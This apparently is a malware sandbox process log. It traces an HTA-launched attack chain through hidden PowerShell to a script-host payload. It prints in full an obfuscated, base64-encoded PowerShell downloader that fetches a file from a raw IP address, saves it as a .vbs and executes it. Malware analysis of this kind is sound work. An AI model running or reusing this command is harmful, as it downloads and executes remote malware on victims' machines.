mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\nicethingsareworkingwithgreatthingsentiretimegivenmebest.hta
2536cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
2632powershell.exe POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
2720
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
2836
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFA6E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFA5D.tmp"
2892
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs"
2972